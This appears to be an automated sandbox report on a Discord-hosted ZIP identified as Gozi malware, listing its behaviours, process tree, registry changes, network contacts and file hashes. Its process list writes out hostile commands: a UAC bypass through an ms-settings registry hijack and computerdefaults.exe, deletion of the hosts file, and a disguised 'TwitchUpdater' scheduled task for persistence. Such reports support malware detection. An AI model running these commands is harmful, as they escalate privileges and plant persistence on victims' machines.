Analysis Overview
Threat Level: Known bad
The file https://cdn.discordapp.com/attachments/1216836182860628050/1216845019185418340/gen_build.zip?ex=6601de3c&is=65ef693c&hm=d1a1eca8ddeec67d4541910893b2b076143ae403d58fa7b7faf2aa262e14cdda& was found to be: Known bad.
Malicious Activity Summary
Gozi
Loads dropped DLL
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Creates scheduled task(s)
Modifies data under HKEY_USERS
Modifies registry class
NTFS ADS
Enumerates system info in registry
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-11 20:37
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-11 20:37
Reported
2024-03-11 20:38
Platform
win11-20240221-en
Max time kernel
57s
Max time network
58s
Command Line
Signatures
Gozi
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\l15qrp4j.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Temp1_gen_build.zip\gen.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133546630646097623" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\ms-settings\shell | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\ms-settings\shell\open | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\ms-settings\shell\open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\chinahalf1930182.vbs" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\ms-settings\shell\open\command | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\ms-settings\shell\open\command | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\ms-settings | C:\Windows\SysWOW64\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\gen_build.zip:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://cdn.discordapp.com/attachments/1216836182860628050/1216845019185418340/gen_build.zip?ex=6601de3c&is=65ef693c&hm=d1a1eca8ddeec67d4541910893b2b076143ae403d58fa7b7faf2aa262e14cdda&
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9351d9758,0x7ff9351d9768,0x7ff9351d9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1664 --field-trial-handle=1832,i,10564693612482137825,11985617361448915169,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1832,i,10564693612482137825,11985617361448915169,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2188 --field-trial-handle=1832,i,10564693612482137825,11985617361448915169,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2988 --field-trial-handle=1832,i,10564693612482137825,11985617361448915169,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2996 --field-trial-handle=1832,i,10564693612482137825,11985617361448915169,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5096 --field-trial-handle=1832,i,10564693612482137825,11985617361448915169,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5396 --field-trial-handle=1832,i,10564693612482137825,11985617361448915169,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5192 --field-trial-handle=1832,i,10564693612482137825,11985617361448915169,131072 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Temp\Temp1_gen_build.zip\gen.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_gen_build.zip\gen.exe"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\chinahalf1930182.vbs" /f
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /d "0" /f
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C computerdefaults.exe
C:\Windows\SysWOW64\ComputerDefaults.exe
computerdefaults.exe
C:\Windows\SysWOW64\wscript.exe
"wscript.exe" C:\Users\Admin\AppData\Local\Temp\chinahalf1930182.vbs
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C schtasks /Create /SC ONLOGON /TN TwitchUpdater_A7Q2drImVArLnmrvI050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\A7Q2drImVArLnmrvI050MX.exe" /RL HIGHEST /IT
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC ONLOGON /TN TwitchUpdater_A7Q2drImVArLnmrvI050MX /TR "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\A7Q2drImVArLnmrvI050MX.exe" /RL HIGHEST /IT
C:\Users\Admin\AppData\Local\Temp\l15qrp4j.exe
"C:\Users\Admin\AppData\Local\Temp\l15qrp4j.exe" explorer.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.135.159.162.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 104.21.79.145:443 | textpubshiers.top | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
Files
\??\pipe\crashpad_2284_SNVMLDAIKDMCOGZA
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\Downloads\gen_build.zip:Zone.Identifier
| MD5 | 3b2cabd8e404aacb485f237442b8de64 |
| SHA1 | 1f63d14fc77e565acf375cb8cc7ac3402d42a675 |
| SHA256 | 0445f18fb1d4908ffa5258d6d60d51c7018964e6f69455fdb6afa7ac3a194b99 |
| SHA512 | c0305a2fe69fb896d7e667c459372d8b9935aed3c22dbe6ae7f5152cbe206a8d7f70983ec36123b5afff11b67b6ed3389914a6d7472728e9a0f880a6b5d01ab5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 6f13b44bc9045c87333d23758a1affa3 |
| SHA1 | fd3913923591d3d0ac815a64de9425cd73387d01 |
| SHA256 | 36fd088d6d36f976793e9ab250667b61b9dc17da2cf90a0c736d27e648b198d7 |
| SHA512 | 965483c4dd369a21ec58b6ebc056e8aef91611378483cac2a4b7e3a454bfb923ae3eaea16720ee75000d6f006ee0e9a8bf59ab2a6874ea5ff5ec41a8346d1d64 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | f8ea33d77c814102f7b4c58365f2d990 |
| SHA1 | 3c3acce7b66aa6892a096d7ee37b2fc598012cf8 |
| SHA256 | 5520a08ef03ebcc47625990fe8e480637cd273d888f193c2f15becac5e588cb5 |
| SHA512 | b6915e9a098b2975dacfbe5a6530d7abc2c1491b72be97481fd00e9997a5cbc9be75267b7820b99d39efbd1f932b72087d7f9310521e28687e2db5308f4ba4fd |
C:\Users\Admin\Downloads\gen_build.zip
| MD5 | 41f614f1f978c645982238f03983d251 |
| SHA1 | dfd8e4f3d3d934de01e423b3f0393aeb4ebd81c7 |
| SHA256 | 550f5faa4bdd6e5e435a19b6d77af1eace8750c5a9372d71f390454a949215f0 |
| SHA512 | f27d0869c705e5469e0226a22511ee71847367b6eba672208b47111e247c606e1f19d95bc85c496ab919d14f7d89f97947505937fd6dee693e7065fe94ba3b7d |
memory/2712-39-0x0000000000C60000-0x0000000000C6A000-memory.dmp
memory/2712-40-0x0000000002730000-0x000000000274A000-memory.dmp
memory/2712-41-0x0000000074B30000-0x00000000752E1000-memory.dmp
memory/2712-43-0x0000000002720000-0x000000000272A000-memory.dmp
memory/2712-42-0x0000000004D80000-0x0000000004D90000-memory.dmp
memory/2712-44-0x0000000004D90000-0x0000000004E22000-memory.dmp
memory/2712-45-0x00000000053E0000-0x0000000005986000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\chinahalf1930182.vbs
| MD5 | a34267102c21aff46aecc85598924544 |
| SHA1 | 77268af47c6a4b9c6be7f7487b2c9b233d49d435 |
| SHA256 | eba7ab5c248e46dbe70470b41ebf25a378b4eff9ce632adff927ac1f95583d44 |
| SHA512 | 5d320312b93b46c9051a20c82d6405a3f2c78b23adb3ab3e71aad854b65b500937de7ca2986cf79967386d689beecccf676d89afde8ecc5d5ad0cb4ae2bf38a3 |
memory/2712-60-0x000000000AB30000-0x000000000B730000-memory.dmp
memory/2712-70-0x00000000118D0000-0x0000000012572000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Costura\40BD99E3E2E3C109881E4ECA2DEDC617\32\sqlite.interop.dll
| MD5 | 6f2fdecc48e7d72ca1eb7f17a97e59ad |
| SHA1 | fcbc8c4403e5c8194ee69158d7e70ee7dbd4c056 |
| SHA256 | 70e48ef5c14766f3601c97451b47859fddcbe7f237e1c5200cea8e7a7609d809 |
| SHA512 | fea98a3d6fff1497551dc6583dd92798dcac764070a350fd381e856105a6411c94effd4b189b7a32608ff610422b8dbd6d93393c5da99ee66d4569d45191dc8b |
memory/2712-77-0x0000000074B30000-0x00000000752E1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\l15qrp4j.exe
| MD5 | e898826598a138f86f2aa80c0830707a |
| SHA1 | 1e912a5671f7786cc077f83146a0484e5a78729c |
| SHA256 | df443ccf551470b3f9f7d92faf51b3b85ae206dd08da3b6390ce9a6039b7253a |
| SHA512 | 6827068b8580822ded1fb8447bdb038d0e00633f5ef7f480a8cdeaab6928ac23022a0b7a925058e0926ce9b41a6c8c22a5692e074621b2fccdb7edd29a0d4cfb |
memory/3268-87-0x00000000033A0000-0x00000000033A1000-memory.dmp
memory/3268-89-0x0000000002E60000-0x0000000002E68000-memory.dmp
memory/3268-91-0x0000000002E60000-0x0000000002E68000-memory.dmp
memory/2712-88-0x0000000004D80000-0x0000000004D90000-memory.dmp
memory/3268-86-0x0000000002E60000-0x0000000002E68000-memory.dmp
memory/3268-92-0x0000000002E60000-0x0000000002E68000-memory.dmp
memory/2712-98-0x0000000007F30000-0x0000000007F42000-memory.dmp